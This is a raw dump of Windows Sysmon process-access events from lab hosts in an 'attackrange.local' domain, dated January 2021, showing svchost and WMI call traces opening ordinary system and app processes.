22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-337e-6013-9502-000000001100}7612C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362465Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-337f-6013-9702-000000001100}7840C:\Windows\System32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362464Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-337f-6013-9802-000000001100}7944C:\Windows\system32\Windows.WARP.JITService.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362463Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-3380-6013-9a02-000000001100}7332C:\Windows\System32\MicrosoftEdgeCP.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362462Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-3380-6013-9b02-000000001100}7720C:\Windows\system32\MicrosoftEdgeSH.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362461Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-3381-6013-9d02-000000001100}8712C:\Windows\SystemApps\InputApp_cw5n1h2txyewy\WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362460Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-339a-6013-c202-000000001100}10132C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362459Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-339f-6013-c402-000000001100}3448C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362458Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-339f-6013-c502-000000001100}9576C:\Windows\system32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362457Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-33cd-6013-0903-000000001100}6932C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.35.152.0_x64__kzf8qxf38zg5c\SkypeApp.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362456Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362455Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-337d-6013-9102-000000001100}7292C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362454Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-3700-000000001100}2692C:\Windows\System32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362453Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a44-6013-0a00-000000001100}904C:\Windows\system32\services.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362452Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+1e231|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x800000000000000033013Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:51.631{FF16AF91-26B7-6013-1500-00000000A401}14926308C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3000-00000000A401}3584C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033012Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:51.631{FF16AF91-26B7-6013-1500-00000000A401}14926308C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3000-00000000A401}3584C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000362515Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:53.936{8e433fbf-2a46-6013-5700-000000001100}34164116C:\Windows\System32\svchost.exe{8e433fbf-2a45-6013-4c00-000000001100}3676C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rasmans.dll+3751b|c:\windows\system32\rasmans.dll+36fad|c:\windows\system32\rasmans.dll+10ed8|c:\windows\system32\rasmans.dll+33cd5|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362528Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:00.014{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362527Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:00.014{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362526Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:00.014{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-1600-000000001100}1356C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\lsm.dll+1a207|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d 10341000x8000000000000000362525Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:00.014{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362524Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:00.014{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-1600-000000001100}1356C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\lsm.dll+1a207|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d 10341000x8000000000000000362523Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:00.014{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362522Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:00.014{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+f97f|c:\windows\system32\lsm.dll+f7ad|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362521Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:00.014{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+f6ba|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362520Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 